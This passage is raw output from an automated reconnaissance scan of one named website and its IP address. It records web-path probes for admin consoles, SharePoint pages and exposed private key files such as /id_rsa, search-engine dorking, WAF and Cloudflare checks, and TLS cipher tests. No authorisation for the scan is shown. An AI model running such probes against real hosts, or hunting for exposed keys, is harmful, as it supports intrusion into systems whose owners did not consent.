5778+ OSVDB-96181: /adfs/services/trust/proxymexhttpget/: Active Directory Federation Services page found.
5779+ OSVDB-96181: /adfs/services/trust/proxymex: Active Directory Federation Services page found.
5780+ OSVDB-96181: /adfs/services/trust/2005/windowstransport: Active Directory Federation Services page found.
5781+ OSVDB-96181: /adfs/services/trust/2005/certificatemixed: Active Directory Federation Services page found.
5782+ OSVDB-96181: /adfs/services/trust/2005/certificatetransport: Active Directory Federation Services page found.
5783+ OSVDB-96181: /adfs/services/trust/2005/usernamemixed: Active Directory Federation Services page found.
5784+ OSVDB-96181: /adfs/services/trust/2005/kerberosmixed: Active Directory Federation Services page found.
5785+ OSVDB-96181: /adfs/services/trust/2005/issuedtokenmixedasymmetricbasic256: Active Directory Federation Services page found.
5786+ OSVDB-96181: /adfs/services/trust/2005/issuedtokenmixedsymmetricbasic256: Active Directory Federation Services page found.
5787+ OSVDB-96181: /adfs/services/trust/13/kerberosmixed: Active Directory Federation Services page found.
5788+ OSVDB-96181: /adfs/services/trust/13/certificatemixed: Active Directory Federation Services page found.
5789+ OSVDB-96181: /adfs/services/trust/13/usernamemixed: Active Directory Federation Services page found.
5790+ OSVDB-96181: /adfs/services/trust/13/issuedtokenmixedasymmetricbasic256: Active Directory Federation Services page found.
5791+ OSVDB-96181: /adfs/services/trust/13/issuedtokenmixedsymmetricbasic256: Active Directory Federation Services page found.
5792+ OSVDB-96181: /adfs/services/trusttcp/windows: Active Directory Federation Services page found.
5793+ OSVDB-96181: /adfs/services/trust/proxytrust: Active Directory Federation Services page found.
5794+ OSVDB-96181: /adfs/services/trust/proxytrust13: Active Directory Federation Services page found.
5795+ OSVDB-96181: /adfs/services/trust/proxytrustprovisionusername: Active Directory Federation Services page found.
5796+ OSVDB-96181: /adfs/services/trust/proxytrustprovisionissuedtoken: Active Directory Federation Services page found.
5797+ OSVDB-96181: /FederationMetadata/2007-06/: Active Directory Federation Services page found.
5798+ OSVDB-96181: /Federationmetadata/2007-06/FederationMetadata.xml: Active Directory Federation Services page found.
5799+ OSVDB-96181: /adfs/ls/IdpInitiatedSignon.aspx: Active Directory Federation Services page found.
5800+ /console/: Application console found
5801+ /wsman/: Windows Remote Management is enabled
5802+ /webservices/: Webservices found
5803+ /atg/bcc: Oracle ATG Business Control Center
5804+ /dyn/admin/: Admin page found; possibly Oracle ATG
5805+ /crx: Adobe CQ CRX Console
5806+ /system/console/configMgr: OSGi Apache Felix console
5807+ /system/console/bundles: OSGi Apache Felix console
5808+ /system/console: OSGi Apache Felix console
5809+ /repository/: CRX WebDAV upload
5810+ /cqresource/: CRX WebDAV upload
5811+ /etc/cloudservices: Adobe Experience Manager Cloud Service Information
5812+ /etc/reports: Adobe Experience Manager Reports
5813+ OSVDB-3092: /dumpinfo: National Instruments Service Locator
5814+ /manage/Logs/: Covertix SmartCipher Console Login and Web Service Log directory detected
5815+ /rsa: Encryption key exposed
5816+ /dsa: Encryption key exposed
5817+ /id_rsa: Encryption key exposed
5818+ /id_dsa: Encryption key exposed
5819+ /identity: Encryption key exposed
5820+ /key: Encryption key exposed
5821+ /encrypt: This might be interesting...
5822+ /decrypt: This might be interesting...
5823+ OSVDB-3093: /includes/db.inc: Include files (.inc) should not be served in plain text.
5824+ /debug/: Possible debug directory/program found.
5825+ /_vti_bin/owssvr.dll: FrontPage/Sharepointfile available.
5826+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
5827+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
5828+ /_vti_bin/_vti_aut/WS_FTP.log: FrontPage/Sharepointfile available.
5829+ /_vti_bin/_vti_aut/ws_ftp.log: FrontPage/Sharepointfile available.
5830+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.
5831+ /_layouts/addrole.aspx: FrontPage/Sharepointfile available.
5832+ /_layouts/AdminRecycleBin.aspx: FrontPage/Sharepointfile available.
5833+ /_layouts/AreaNavigationSettings.aspx: FrontPage/Sharepointfile available.
5834+ /_Layouts/AreaTemplateSettings.aspx: FrontPage/Sharepointfile available.
5835+ /_Layouts/AreaWelcomePage.aspx: FrontPage/Sharepointfile available.
5836+ /_layouts/bpcf.aspx: FrontPage/Sharepointfile available.
5837+ /_Layouts/ChangeSiteMasterPage.aspx: FrontPage/Sharepointfile available.
5838+ /_layouts/create.aspx: FrontPage/Sharepointfile available.
5839+ /_layouts/editgrp.aspx: FrontPage/Sharepointfile available.
5840+ /_layouts/editprms.aspx: FrontPage/Sharepointfile available.
5841+ /_layouts/help.aspx: FrontPage/Sharepointfile available.
5842+ /_layouts/images/: FrontPage/Sharepointfile available.
5843+ /_layouts/listedit.aspx: FrontPage/Sharepointfile available.
5844+ /_layouts/ManageFeatures.aspx: FrontPage/Sharepointfile available.
5845+ /_layouts/mcontent.aspx: FrontPage/Sharepointfile available.
5846+ /_layouts/mngctype.aspx: FrontPage/Sharepointfile available.
5847+ /_layouts/mngfield.aspx: FrontPage/Sharepointfile available.
5848+ /_layouts/mngsiteadmin.aspx: FrontPage/Sharepointfile available.
5849+ /_layouts/mngsubwebs.aspx: FrontPage/Sharepointfile available.
5850+ /_layouts/mngsubwebs.aspx?view=sites: FrontPage/Sharepointfile available.
5851+ /_layouts/mobile/mbllists.aspx: FrontPage/Sharepointfile available.
5852+ /_layouts/MyInfo.aspx: FrontPage/Sharepointfile available.
5853+ /_layouts/MyPage.aspx: FrontPage/Sharepointfile available.
5854+ /_layouts/MyTasks.aspx: FrontPage/Sharepointfile available.
5855+ /_layouts/navoptions.aspx: FrontPage/Sharepointfile available.
5856+ /_layouts/NewDwp.aspx: FrontPage/Sharepointfile available.
5857+ /_layouts/newgrp.aspx: FrontPage/Sharepointfile available.
5858+ /_layouts/newsbweb.aspx: FrontPage/Sharepointfile available.
5859+ /_layouts/PageSettings.aspx: FrontPage/Sharepointfile available.
5860+ /_layouts/people.aspx?MembershipGroupId=0: FrontPage/Sharepointfile available.
5861+ /_layouts/permsetup.aspx: FrontPage/Sharepointfile available.
5862+ /_layouts/picker.aspx: FrontPage/Sharepointfile available.
5863+ /_layouts/policy.aspx: FrontPage/Sharepointfile available.
5864+ /_layouts/policyconfig.aspx: FrontPage/Sharepointfile available.
5865+ /_layouts/policycts.aspx: FrontPage/Sharepointfile available.
5866+ /_layouts/Policylist.aspx: FrontPage/Sharepointfile available.
5867+ /_layouts/prjsetng.aspx: FrontPage/Sharepointfile available.
5868+ /_layouts/quiklnch.aspx: FrontPage/Sharepointfile available.
5869+ /_layouts/recyclebin.aspx: FrontPage/Sharepointfile available.
5870+ /_Layouts/RedirectPage.aspx: FrontPage/Sharepointfile available.
5871+ /_layouts/role.aspx: FrontPage/Sharepointfile available.
5872+ /_layouts/settings.aspx: FrontPage/Sharepointfile available.
5873+ /_layouts/SiteDirectorySettings.aspx: FrontPage/Sharepointfile available.
5874+ /_layouts/sitemanager.aspx: FrontPage/Sharepointfile available.
5875+ /_layouts/SiteManager.aspx?lro=all: FrontPage/Sharepointfile available.
5876+ /_layouts/spcf.aspx: FrontPage/Sharepointfile available.
5877+ /_layouts/storman.aspx: FrontPage/Sharepointfile available.
5878+ /_layouts/themeweb.aspx: FrontPage/Sharepointfile available.
5879+ /_layouts/topnav.aspx: FrontPage/Sharepointfile available.
5880+ /_layouts/user.aspx: FrontPage/Sharepointfile available.
5881+ /_layouts/userdisp.aspx?ID=1: FrontPage/Sharepointfile available.
5882+ /_layouts/useredit.aspx: FrontPage/Sharepointfile available.
5883+ /_layouts/useredit.aspx?ID=1: FrontPage/Sharepointfile available.
5884+ /_layouts/viewlsts.aspx: FrontPage/Sharepointfile available.
5885+ /_layouts/vsubwebs.aspx: FrontPage/Sharepointfile available.
5886+ /_layouts/WPPrevw.aspx?ID=247: FrontPage/Sharepointfile available.
5887+ /_layouts/wrkmng.aspx: FrontPage/Sharepointfile available.
5888+ /Forms/DispForm.aspx: FrontPage/Sharepointfile available.
5889+ /Forms/DispForm.aspx?ID=1: FrontPage/Sharepointfile available.
5890+ /Forms/EditForm.aspx: FrontPage/Sharepointfile available.
5891+ /Forms/EditForm.aspx?ID=1: FrontPage/Sharepointfile available.
5892+ /Forms/Forms/AllItems.aspx: FrontPage/Sharepointfile available.
5893+ /Forms/MyItems.aspx: FrontPage/Sharepointfile available.
5894+ /Forms/NewForm.aspx: FrontPage/Sharepointfile available.
5895+ /Pages/default.aspx: FrontPage/Sharepointfile available.
5896+ /Pages/Forms/AllItems.aspx: FrontPage/Sharepointfile available.
5897+ /_catalogs/masterpage/Forms/AllItems.aspx: FrontPage/Sharepointfile available.
5898+ /_catalogs/wp/Forms/AllItems.aspx: FrontPage/Sharepointfile available.
5899+ /_catalogs/wt/Forms/Common.aspx: FrontPage/Sharepointfile available.
5900+ /_vti_pvt/service.grp: FrontPage/Sharepointfile available.
5901+ /_vti_pvt/botsinf.cnf: FrontPage/Sharepointfile available.
5902+ /_vti_pvt/structure.cnf: FrontPage/Sharepointfile available.
5903+ /_vti_pvt/uniqperm.cnf: FrontPage/Sharepointfile available.
5904+ /server-manager/: Mitel Audio and Web Conferencing server manager identified.
5905+ /wp-content/plugins/gravityforms/change_log.txt: Gravity forms is installed. Based on the version number in the changelog, it is vulnerable to an authenticated SQL injection. https://wpvulndb.com/vulnerabilities/7849
5906+ /manager/status: Tomcat Server Status interface found (pass protected)
5907+ /jk-manager/status: Tomcat Server Status interface found (pass protected)
5908+ /jk-status/status: Tomcat Server Status interface found (pass protected)
5909+ /admin/status: Tomcat Server Status interface found (pass protected)
5910+ /host-manager/status: Tomcat Server Status interface found (pass protected)
5911+ /server-info: Apache server-info interface found (pass protected)
5912+ 7499 requests: 0 error(s) and 1791 item(s) reported on remote host
5913+ End Time: 2017-11-30 01:23:45 (GMT-5) (949 seconds)
5914---------------------------------------------------------------------------
5915+ 1 host(s) tested
5916[92m + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +[0m
5917[91m[+][0m Screenshot saved to /usr/share/sniper/loot/screenshots/pedo-paradise.myminicity.fr-port80.jpg
5918[92m + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +[0m
5919[92m + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +[0m
5920
5921[1;310m _____ [1;37m .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. [0;31m.1BR'''Yp, .8BR'''Cq.
5922[1;310m (_____)[1;37m 01 01N. C 01 C 01 .01. 01 [1;31m 01 Yb 01 .01.
5923[1;310m (() ())[1;37m 01 C YCb C 01 C 01 ,C9 01 [0;31m 01 dP 01 ,C9
5924[1;310m \ / [1;37m 01 C .CN. C 01 C 0101dC9 01 [1;31m 01'''bg. 0101dC9
5925[1;310m \ / [1;37m 01 C .01.C 01 C 01 YC. 01 , [0;31m 01 .Y 01 YC.
5926[1;310m /=\ [1;37m 01 C Y01 YC. ,C 01 .Cb. 01 ,C [1;31m 01 ,9 01 .Cb.
5927[1;310m [___] [1;37m .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C [0;31m.J0101Cd9 .J01L. .J01./ [1;37m2.1
5928
5929[1;37m__[ ! ] Neither war between hackers, nor peace for the system.
5930[1;37m__[ ! ] [02;31mhttp://blog.inurl.com.br
5931[1;37m__[ ! ] [02;31mhttp://fb.com/InurlBrasil
5932[1;37m__[ ! ] [02;31mhttp://twitter.com/@googleinurl[0m
5933[1;37m__[ ! ] [02;31mhttp://github.com/googleinurl[0m
5934[1;37m__[ ! ] [02;31mCurrent PHP version::[ [1;37m7.0.25-1 [02;31m][0m
5935[1;37m__[ ! ] [02;31mCurrent script owner::[ [1;37mroot [02;31m][0m
5936[1;37m__[ ! ] [02;31mCurrent uname::[ [1;37mLinux Kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 [02;31m][0m
5937[1;37m__[ ! ] [02;31mCurrent pwd::[ [1;37m/usr/share/sniper [02;31m][0m
5938[1;37m__[ ! ] [1;33mHelp: php inurlbr.php --help[0m
5939[1;37m------------------------------------------------------------------------------------------------------------------------[0m
5940
5941[1;37m[ ! ] Starting SCANNER INURLBR 2.1 at [30-11-2017 01:24:48][0;37m
5942[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
5943It is the end user's responsibility to obey all applicable local, state and federal laws.
5944Developers assume no liability and are not responsible for any misuse or damage caused by this program[0m
5945
5946[1;37m[ INFO ][02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-pedo-paradise.myminicity.fr.txt ][0m
5947[1;37m[ INFO ][0m[02;31m[ DORK ]::[1;37m[ site:pedo-paradise.myminicity.fr ]
5948[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [1;37m{[0m
5949[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE - www.google.gl ][0m
5950
5951[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
5952[1;37m-[02;31m[[0;31m:::[02;31m][0m
5953[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE API ][0m
5954
5955[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
5956[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
5957[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE_GENERIC_RANDOM - www.google.com.vn ID: 003917828085772992913:gmoeray5sa8 ][0m
5958
5959[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
5960[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
5961
5962[1;37m[ INFO ][0;31m[ TOTAL FOUND VALUES ]::[1;37m [ 0 ][0m
5963[1;37m[ INFO ][1;33m Not a satisfactory result was found![0m
5964
5965
5966[1;37m[ INFO ] [ Shutting down ][0m
5967[1;37m[ INFO ] [ End of process INURLBR at [30-11-2017 01:26:38][0m
5968[1;37m[ INFO ] [0m[02;31m[ TOTAL FILTERED VALUES ]::[1;37m [ 0 ][0m
5969[1;37m[ INFO ] [02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-pedo-paradise.myminicity.fr.txt ][0m
5970[1;37m|_________________________________________________________________________________________[0m
5971
5972[1;37m\_________________________________________________________________________________________/[0m
5973
5974[91m + -- --=[Port 110 closed... skipping.[0m
5975[91m + -- --=[Port 111 closed... skipping.[0m
5976[91m + -- --=[Port 135 closed... skipping.[0m
5977[91m + -- --=[Port 139 closed... skipping.[0m
5978[91m + -- --=[Port 161 closed... skipping.[0m
5979[91m + -- --=[Port 162 closed... skipping.[0m
5980[91m + -- --=[Port 389 closed... skipping.[0m
5981[93m + -- --=[Port 443 opened... running tests...[0m
5982[92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m
5983
5984 ^ ^
5985 _ __ _ ____ _ __ _ _ ____
5986 ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
5987 | V V // o // _/ | V V // 0 // 0 // _/
5988 |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
5989 <
5990 ...'
5991
5992 WAFW00F - Web Application Firewall Detection Tool
5993
5994 By Sandro Gauci && Wendel G. Henrique
5995
5996Checking https://pedo-paradise.myminicity.fr
5997
5998[92m + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +[0m
5999 ____ _ _ _____ _ _
6000 / ___| | ___ _ _ __| | ___|_ _(_) |
6001 | | | |/ _ \| | | |/ _` | |_ / _` | | |
6002 | |___| | (_) | |_| | (_| | _| (_| | | |
6003 \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
6004 v1.0.1 by m0rtem
6005
6006
6007[01:26:49] Initializing CloudFail - the date is: 30/11/2017
6008[01:26:49] Fetching initial information from: pedo-paradise.myminicity.fr...
6009[01:26:57] Server IP: 178.32.123.64
6010[01:26:57] Testing if pedo-paradise.myminicity.fr is on the Cloudflare network...
6011[01:26:57] pedo-paradise.myminicity.fr is not part of the Cloudflare network, quitting...
6012[92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
6013[1m[34mhttps://pedo-paradise.myminicity.fr[0m [200 OK] [1m[37mApache[0m, [1m[37mCountry[0m[[37mFRANCE[0m][[1m[31mFR[0m], [1m[37mHTTPServer[0m[[1m[36mApache[0m], [1m[37mIP[0m[[37m178.32.123.64[0m]
6014
6015[92m + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +[0m
6016
6017
6018
6019 AVAILABLE PLUGINS
6020 -----------------
6021
6022 PluginOpenSSLCipherSuites
6023 PluginSessionResumption
6024 PluginChromeSha1Deprecation
6025 PluginHSTS
6026 PluginHeartbleed
6027 PluginCompression
6028 PluginCertInfo
6029 PluginSessionRenegotiation
6030
6031
6032
6033 CHECKING HOST(S) AVAILABILITY
6034 -----------------------------
6035
6036 pedo-paradise.myminicity.fr:443 => 178.32.123.64:443
6037
6038
6039
6040 SCAN RESULTS FOR PEDO-PARADISE.MYMINICITY.FR:443 - 178.32.123.64:443
6041 --------------------------------------------------------------------
6042
6043 * Deflate Compression:
6044 OK - Compression disabled
6045
6046 * Session Renegotiation:
6047 Client-initiated Renegotiations: OK - Rejected
6048 Secure Renegotiation: OK - Supported
6049
6050 * Certificate - Content:
6051 SHA1 Fingerprint: 0054bf5d1c8f87cb5a4e695a3b59226c0a2f6384
6052 Common Name: *.motion-twin.com
6053 Issuer: Gandi Standard SSL CA 2
6054 Serial Number: 481102BEE6E15AA686DE919906E44B6A
6055 Not Before: Jan 22 00:00:00 2016 GMT
6056 Not After: Feb 19 23:59:59 2018 GMT
6057 Signature Algorithm: sha256WithRSAEncryption
6058 Public Key Algorithm: rsaEncryption
6059 Key Size: 2048 bit
6060 Exponent: 65537 (0x10001)
6061 X509v3 Subject Alternative Name: {'DNS': ['*.motion-twin.com', 'motion-twin.com']}
6062
6063 * Certificate - Trust:
6064 Hostname Validation: FAILED - Certificate does NOT match pedo-paradise.myminicity.fr
6065 Google CA Store (09/2015): OK - Certificate is trusted
6066 Java 6 CA Store (Update 65): OK - Certificate is trusted
6067 Microsoft CA Store (09/2015): OK - Certificate is trusted
6068 Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
6069 Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
6070 Certificate Chain Received: ['*.motion-twin.com', 'Gandi Standard SSL CA 2', 'USERTrust RSA Certification Authority']
6071
6072 * Certificate - OCSP Stapling:
6073 NOT SUPPORTED - Server did not send back an OCSP response.
6074
6075 * SSLV2 Cipher Suites:
6076 Server rejected all cipher suites.
6077
6078 * SSLV3 Cipher Suites:
6079 Server rejected all cipher suites.
6080
6081 * Session Resumption:
6082 With Session IDs: ERROR (0 successful, 3 failed, 2 errors, 5 total attempts).
6083 ERROR #1: timeout - timed out
6084 ERROR #2: timeout - timed out
6085 With TLS Session Tickets: NOT SUPPORTED - TLS ticket assigned but not accepted.
6086
6087
6088
6089 SCAN COMPLETED IN 40.45 S
6090 -------------------------
6091Version: [32m1.11.10-static[0m
6092OpenSSL 1.0.2-chacha (1.0.2g-dev)
6093[0m
6094Testing SSL server [32mpedo-paradise.myminicity.fr[0m on port [32m443[0m using SNI name [32mpedo-paradise.myminicity.fr[0m
6095
6096 [1;34mTLS Fallback SCSV:[0m
6097Server [32msupports[0m TLS Fallback SCSV
6098
6099 [1;34mTLS renegotiation:[0m
6100[32mSecure[0m session renegotiation supported
6101
6102 [1;34mTLS Compression:[0m
6103Compression [32mdisabled[0m
6104
6105 [1;34mHeartbleed:[0m
6106TLS 1.2 [32mnot vulnerable[0m to heartbleed
6107TLS 1.1 [32mnot vulnerable[0m to heartbleed
6108TLS 1.0 [32mnot vulnerable[0m to heartbleed
6109
6110 [1;34mSupported Server Cipher(s):[0m
6111[32mPreferred[0m TLSv1.2 [32m256[0m bits [32mECDHE-RSA-AES256-GCM-SHA384 [0m Curve P-256 DHE 256
6112Accepted TLSv1.2 [32m128[0m bits [32mECDHE-RSA-AES128-GCM-SHA256 [0m Curve P-256 DHE 256
6113Accepted TLSv1.2 [32m256[0m bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
6114Accepted TLSv1.2 [32m128[0m bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
6115Accepted TLSv1.2 [32m128[0m bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
6116Accepted TLSv1.2 [32m128[0m bits AES128-SHA
6117Accepted TLSv1.2 [32m112[0m bits [33mDES-CBC3-SHA [0m
6118Accepted TLSv1.2 [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
6119Accepted TLSv1.2 [32m112[0m bits [33mECDHE-RSA-DES-CBC3-SHA [0m Curve P-256 DHE 256
6120Accepted TLSv1.2 [32m256[0m bits [32mDHE-RSA-AES256-GCM-SHA384 [0m DHE 2048 bits
6121Accepted TLSv1.2 [32m256[0m bits DHE-RSA-AES256-SHA256 DHE 2048 bits
6122Accepted TLSv1.2 [32m256[0m bits DHE-RSA-AES256-SHA DHE 2048 bits
6123Accepted TLSv1.2 [32m256[0m bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
6124Accepted TLSv1.2 [32m128[0m bits [32mDHE-RSA-AES128-GCM-SHA256 [0m DHE 2048 bits
6125Accepted TLSv1.2 [32m128[0m bits DHE-RSA-AES128-SHA256 DHE 2048 bits
6126Accepted TLSv1.2 [32m128[0m bits DHE-RSA-AES128-SHA DHE 2048 bits
6127Accepted TLSv1.2 [32m128[0m bits DHE-RSA-SEED-SHA DHE 2048 bits
6128Accepted TLSv1.2 [32m128[0m bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
6129Accepted TLSv1.2 [32m112[0m bits [33mEDH-RSA-DES-CBC3-SHA [0m DHE 2048 bits
6130[32mPreferred[0m TLSv1.1 [32m128[0m bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
6131Accepted TLSv1.1 [32m128[0m bits AES128-SHA
6132Accepted TLSv1.1 [32m112[0m bits [33mDES-CBC3-SHA [0m
6133Accepted TLSv1.1 [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
6134Accepted TLSv1.1 [32m112[0m bits [33mECDHE-RSA-DES-CBC3-SHA [0m Curve P-256 DHE 256
6135Accepted TLSv1.1 [32m256[0m bits DHE-RSA-AES256-SHA DHE 2048 bits
6136Accepted TLSv1.1 [32m256[0m bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
6137Accepted TLSv1.1 [32m128[0m bits DHE-RSA-AES128-SHA DHE 2048 bits
6138Accepted TLSv1.1 [32m128[0m bits DHE-RSA-SEED-SHA DHE 2048 bits
6139Accepted TLSv1.1 [32m128[0m bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
6140Accepted TLSv1.1 [32m112[0m bits [33mEDH-RSA-DES-CBC3-SHA [0m DHE 2048 bits
6141[32mPreferred[0m [33mTLSv1.0[0m [32m128[0m bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
6142Accepted [33mTLSv1.0[0m [32m128[0m bits AES128-SHA
6143Accepted [33mTLSv1.0[0m [32m112[0m bits [33mDES-CBC3-SHA [0m
6144Accepted [33mTLSv1.0[0m [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
6145Accepted [33mTLSv1.0[0m [32m112[0m bits [33mECDHE-RSA-DES-CBC3-SHA [0m Curve P-256 DHE 256
6146Accepted [33mTLSv1.0[0m [32m256[0m bits DHE-RSA-AES256-SHA DHE 2048 bits
6147Accepted [33mTLSv1.0[0m [32m256[0m bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
6148Accepted [33mTLSv1.0[0m [32m128[0m bits DHE-RSA-AES128-SHA DHE 2048 bits
6149Accepted [33mTLSv1.0[0m [32m128[0m bits DHE-RSA-SEED-SHA DHE 2048 bits
6150Accepted [33mTLSv1.0[0m [32m128[0m bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
6151Accepted [33mTLSv1.0[0m [32m112[0m bits [33mEDH-RSA-DES-CBC3-SHA [0m DHE 2048 bits
6152
6153 [1;34mSSL Certificate:[0m
6154Signature Algorithm: [32msha256WithRSAEncryption[0m
6155RSA Key Strength: 2048
6156
6157Subject: *.motion-twin.com
6158Altnames: DNS:*.motion-twin.com, DNS:motion-twin.com
6159Issuer: Gandi Standard SSL CA 2
6160
6161Not valid before: [32mJan 22 00:00:00 2016 GMT[0m
6162Not valid after: [32mFeb 19 23:59:59 2018 GMT[0m
6163[1m
6164###########################################################
6165 testssl 2.9dev from [m[1mhttps://testssl.sh/dev/[m
6166[1m
6167 This program is free software. Distribution and
6168 modification under GPLv2 permitted.
6169 USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
6170
6171 Please file bugs @ [m[1mhttps://testssl.sh/bugs/[m
6172[1m
6173###########################################################[m
6174
6175 Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
6176 on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
6177 (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
6178
6179
6180[7m Start 2017-11-30 01:28:54 -->> 178.32.123.64:443 (pedo-paradise.myminicity.fr) <<--[m
6181
6182 rDNS (178.32.123.64): ip64.ip-178-32-123.eu.
6183 Service detected: HTTP
6184
6185
6186[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
6187
6188[1m SSLv2 [m[1;32mnot offered (OK)[m
6189[1m SSLv3 [m[1;32mnot offered (OK)[m
6190[1m TLS 1 [moffered
6191[1m TLS 1.1 [moffered
6192[1m TLS 1.2 [m[1;32moffered (OK)[m
6193[1m TLS 1.3 [mnot offered
6194[1m SPDY/NPN [mnot offered
6195[1m HTTP2/ALPN [mhttp/1.1 (offered)
6196
6197[1m[4m Testing ~standard cipher categories [m
6198
6199[1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
6200[1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
6201[1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
6202[1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
6203[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;31moffered (NOT ok)[m
6204[1m Triple DES Ciphers (Medium) [m[0;33moffered[m
6205[1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
6206[1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
6207
6208
6209[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
6210
6211[0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-GCM-SHA384
6212 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
6213 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
6214 DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
6215 ECDHE-RSA-AES128-GCM-SHA256
6216 ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
6217 DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-SHA256
6218 DHE-RSA-AES128-SHA DHE-RSA-SEED-SHA
6219 DHE-RSA-CAMELLIA128-SHA
6220[1m Elliptic curves offered: [m[0;32msect283k1[m [0;32msect283r1[m [0;32msect409k1[m [0;32msect409r1[m [0;32msect571k1[m
6221 [0;32msect571r1[m [0;32msecp256k1[m [0;32mprime256v1[m [0;32msecp384r1[m
6222 [0;32msecp521r1[m [0;32mbrainpoolP256r1[m [0;32mbrainpoolP384r1[m
6223 [0;32mbrainpoolP512r1[m
6224
6225
6226[1m[4m Testing server preferences [m
6227
6228[1m Has server cipher order? [m[1;32myes (OK)[m
6229[1m Negotiated protocol [m[1;32mTLSv1.2[m
6230[1m Negotiated cipher [m[1;32mECDHE-RSA-AES256-GCM-SHA384[m, [0;32m256 bit ECDH (P-256)[m
6231[1m Cipher order[m
6232 TLSv1: ECDHE-RSA-AES128-SHA AES128-SHA DES-CBC3-SHA
6233 ECDHE-RSA-AES256-SHA ECDHE-RSA-DES-CBC3-SHA DHE-RSA-AES256-SHA
6234 DHE-RSA-CAMELLIA256-SHA DHE-RSA-AES128-SHA DHE-RSA-SEED-SHA
6235 DHE-RSA-CAMELLIA128-SHA EDH-RSA-DES-CBC3-SHA
6236 TLSv1.1: ECDHE-RSA-AES128-SHA AES128-SHA DES-CBC3-SHA
6237 ECDHE-RSA-AES256-SHA ECDHE-RSA-DES-CBC3-SHA DHE-RSA-AES256-SHA
6238 DHE-RSA-CAMELLIA256-SHA DHE-RSA-AES128-SHA DHE-RSA-SEED-SHA
